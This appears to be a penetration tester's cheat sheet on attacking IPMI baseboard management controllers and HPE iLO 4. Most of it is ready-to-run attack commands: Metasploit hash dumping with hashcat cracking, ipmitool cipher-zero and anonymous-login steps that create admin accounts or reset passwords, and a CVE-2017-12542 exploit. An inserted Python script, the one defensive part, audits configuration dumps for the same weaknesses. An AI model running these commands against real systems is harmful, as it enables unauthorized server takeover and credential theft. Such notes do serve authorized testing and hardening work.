# IPMI

* <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>
* <https://habr.com/ru/company/selectel/blog/439834/>

## Discovery

```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

## Dump Hashes

**CVE-2013-4786**

Dump hashes:

```
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Recover plaintext passwords:

```
$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi_hashes.txt seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username
```

## Cipher Zero

**CVE-2013-4805**

Discover with MSF:

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Guess an existing admin username. If `ADMIN` is a valid username, the `user list` command succeeds regardless of the password supplied:

```
$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list
```

Add a new admin user (only a valid existing admin username is needed; `<ID>` is a free user-ID slot taken from the `user list` output):

```
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>
```

## Anonymous Authentication

Can be discovered with the MSF `ipmi_dumphashes` module, but also with ipmitool by supplying an empty username and password:

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list
```

Change the password of a named user account (`<ID>` taken from the `user list` output):

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'
```
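Both weaknesses above (cipher suite 0 still accepted, and the anonymous empty-name user left enabled) can be audited from a BMC's own configuration dump instead of by trial logins. The following is an added example, not part of the original notes nor of ipmitool or Metasploit: it parses `ipmitool lan print 1` and `ipmitool user list 1` output (constructed samples embedded below, not captured from a real device), flags the two conditions, and emits the ipmitool remediation commands. It assumes LAN channel 1 and that the BMC firmware honours `lan set ... cipher_privs`.

```python
"""Offline audit of a BMC's own ipmitool output for two weaknesses:
RMCP+ cipher suite 0 still permitted, and an enabled anonymous (empty-name) user.
Feed in the text of `ipmitool -I lanplus -H <bmc> -U <user> -P <pass> lan print 1`
and `... user list 1`; the samples below are constructed, not captured."""

import re

# Constructed, abridged `ipmitool lan print 1` output (LAN channel 1 assumed).
LAN_PRINT_SAMPLE = """\
Set in Progress         : Set Complete
Auth Type Support       : MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

# Constructed `ipmitool user list 1` output; ID 1 is the empty-name (anonymous) slot.
USER_LIST_SAMPLE = """\
ID  Name\t     Callin  Link Auth\tIPMI Msg   Channel Priv Limit
1                    true    false      true       ADMINISTRATOR
2   ADMIN            true    false      true       ADMINISTRATOR
3   monitor          true    false      true       USER
4                    true    false      false      NO ACCESS
"""

# Letters used by ipmitool in the 'Cipher Suite Priv Max' string; position i = suite i.
PRIV_LETTERS = {"X": "UNUSED", "c": "CALLBACK", "u": "USER",
                "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}


def cipher_priv_string(lan_print):
    """Extract the raw per-suite privilege letters from `lan print` output."""
    m = re.search(r"^Cipher Suite Priv Max\s*:\s*([XcuoaO]+)\s*$", lan_print, re.M)
    if not m:
        raise ValueError("no 'Cipher Suite Priv Max' line in lan print output")
    return m.group(1)


def parse_cipher_privs(lan_print):
    """Map cipher suite number -> maximum privilege level it may be used at."""
    return {i: PRIV_LETTERS[ch] for i, ch in enumerate(cipher_priv_string(lan_print))}


def hardened_cipher_privs(lan_print):
    """Same letter string with suite 0 forced to X (unused); other suites untouched."""
    raw = cipher_priv_string(lan_print)
    return "X" + raw[1:]


def parse_user_list(user_list):
    """Parse `user list` rows.  The Name column may be empty, so each row is split on
    whitespace and the three true/false columns are located explicitly."""
    users = []
    for line in user_list.splitlines()[1:]:          # first line is the header
        tokens = line.split()
        if not tokens or not tokens[0].isdigit():
            continue
        flags = [k for k, t in enumerate(tokens) if t in ("true", "false")]
        if len(flags) < 3:
            continue
        first = flags[0]
        users.append({
            "id": int(tokens[0]),
            "name": " ".join(tokens[1:first]),        # "" for the anonymous slot
            "callin": tokens[first] == "true",
            "link_auth": tokens[first + 1] == "true",
            "ipmi_msg": tokens[first + 2] == "true",
            "priv": " ".join(tokens[first + 3:]),     # "NO ACCESS" contains a space
        })
    return users


def admin_usernames(user_list):
    """Named, IPMI-enabled ADMINISTRATOR accounts: the usernames worth renaming away
    from vendor defaults, since cipher 0 / RAKP attacks only need a valid name."""
    return [u["name"] for u in parse_user_list(user_list)
            if u["name"] and u["ipmi_msg"] and u["priv"] == "ADMINISTRATOR"]


def audit(lan_print, user_list, channel=1):
    """Return (finding, remediation command) pairs for the two weaknesses."""
    findings = []
    privs = parse_cipher_privs(lan_print)
    if privs.get(0, "UNUSED") != "UNUSED":
        findings.append((
            f"cipher suite 0 (no authentication) permitted up to {privs[0]} privilege",
            f"ipmitool lan set {channel} cipher_privs {hardened_cipher_privs(lan_print)}",
        ))
    for u in parse_user_list(user_list):
        if u["name"] == "" and u["ipmi_msg"] and u["priv"] != "NO ACCESS":
            findings.append((
                f"anonymous user (ID {u['id']}) enabled with {u['priv']} privilege",
                f"ipmitool user priv {u['id']} 15 {channel} && ipmitool user disable {u['id']}",
            ))
    return findings


if __name__ == "__main__":
    for finding, fix in audit(LAN_PRINT_SAMPLE, USER_LIST_SAMPLE):
        print(f"[!] {finding}\n    fix: {fix}")
    print("[i] named admin accounts:", ", ".join(admin_usernames(USER_LIST_SAMPLE)))
```

After applying the suggested `cipher_privs` string, re-run the `ipmitool -C 0 ... user list` check from the section above: some firmware silently ignores the setting, and only a failed cipher-0 session proves it took effect.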

## HPE iLO 4

* <https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/>
* <https://github.com/airbus-seclab/ilo4_toolbox>

### Add Admin User

**CVE-2017-12542**

Exploit with Python:

* <https://www.exploit-db.com/exploits/44005>

```
$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1
```

Exploit with MSF:

```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run
```
